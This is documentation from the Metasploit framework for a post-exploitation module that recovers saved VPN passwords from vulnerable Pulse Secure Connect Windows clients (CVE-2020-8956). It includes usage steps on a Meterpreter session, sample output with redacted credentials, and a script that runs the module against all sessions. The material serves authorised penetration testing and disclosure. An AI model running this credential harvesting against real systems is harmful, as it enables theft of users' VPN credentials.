rapid7/metasploit-framework
# [CVE-2020-8956] Pulse Secure Connect Client Credentials Gatherer

This post-exploitation module takes advantage of how Pulse Secure Connect clients save user credentials in order to recover them.

TL;DR; Pulse Secure Connect versions up to 9.1R4 and 9.0R5 included rely on Windows DPAPI with a known IV to encrypt credentials before saving them to the registry. This means a malicious process can recover the user's credentials (if they chose to save them).

More details can be found on the accompanying blog post at https://quentinkaiser.be/reversing/2020/10/27/pule-secure-credentials/.

## Vulnerable Application

Pulse Secure Connect VPN Client for Windows 9.1.x < 9.1R4 and 9.0.x < 9.0R5.

An end-to-end setup with working Juniper Pulse Secure VPN server, Pulse Secure client on Microsoft Windows, and valid credentials are required for Pulse Secure client to save credentials locally and therefore test this.

## Verification Steps

To verify that it works, you should obtain a Meterpreter shell on a Windows host running Pulse Secure client version 9.1.x prior to 9.1R4 or 9.0.x prior to 9.0R5. That client should have a saved VPN connection where the user explicitly ticked the 'save password' box at some point in time.

1. Get a Meterpreter on a windows machine that has Pulse Secure client installed.
2. Load the module: `use post/windows/gather/credentials/pulse_secure`
3. Set the correct session on the module.
4. Run the module and enjoy the loot.

## Example Run

**Normal mode**
```
msf > use post/windows/gather/credentials/pulse_secure
msf > set SESSION 1
msf > run
```

Output:

```
[*] Checking for Pulse Secure IVE profiles in the registry
[+] Account Found:
[*]      Username:
[*]      Password: REDACTED
[*]      URI: https://connect.contoso.com/pulse
[*]      Name: Home Working VPN (EU)
[*]      Source: user
[+] Account Found:
[*]      Username:
[*]      Password: REDACTED
[*]      URI: https://connect.contoso.com/pulse
[*]      Name: Home Working VPN (US)
[*]      Source: user
[*] Post module execution completed
```

## Scenarios

**Run on all sessions**
If you wish to run the post against all sessions from framework, here is how:

1. Create the following resource script:
```
framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/gather/credentials/pulse_secure")
  run_single("set SESSION #{sid}")
  run_single("run")
end
```
2. At the msf prompt, execute the above resource script:
`msf > resource path-to-resource-script`

## References

- https://qkaiser.github.io/reversing/2020/10/27/pule-secure-credentials
- https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601

## TODO

- [x] Add the ability to extract passwords when running in elevated mode using the known fixed optional entropy value
- [x] Fix the version check (right now a client running 9.0.5 will be considered to be affected because it is < 9.1.4, but 9.0.5 is the fixed version of 9.0 branch)
